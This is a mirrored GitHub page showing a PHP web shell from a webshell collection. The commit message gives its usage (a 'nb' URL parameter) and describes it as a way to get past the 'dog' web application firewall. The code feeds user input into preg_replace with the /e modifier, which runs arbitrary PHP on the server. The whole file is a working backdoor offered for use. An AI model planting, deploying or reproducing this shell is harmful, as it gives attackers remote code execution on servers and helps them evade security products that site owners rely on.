1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-06 04:41:28 +00:00
Files
webshell/php/bypass-dog-2020-01-30.php
tennc 67733cfcdc Create bypass-dog-2020-01-30.php
use: http://xxx.xxx.xx/xxx.php?nb=phpinfo()
form: WX公众号 “ 渗透云笔记” Sigsh
新年从过狗开始
2020-01-30 14:30:09 +08:00

13 lines
180 B
PHP

<?php
class SBdog{
public $x;
function dog(){
$this->x=$_GET['nb'];
}
}
$class=new SBdog();
$class->dog();
$a=$class->x;
preg_replace("/dog/e", $a, "I am a sb dog");
?>